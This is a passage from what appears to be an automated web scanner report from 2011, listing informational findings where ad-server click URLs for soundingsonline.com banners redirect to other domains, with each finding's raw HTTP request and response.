P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.227. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1502189804/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1511666604/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1516627610/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1523538657/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1525091085/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:34:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.233. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1526854970/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1539214827/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

20.235. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1541728132/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1555761797/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.237. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.238. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1566272500/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

20.240. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1568256774/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1588906246/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
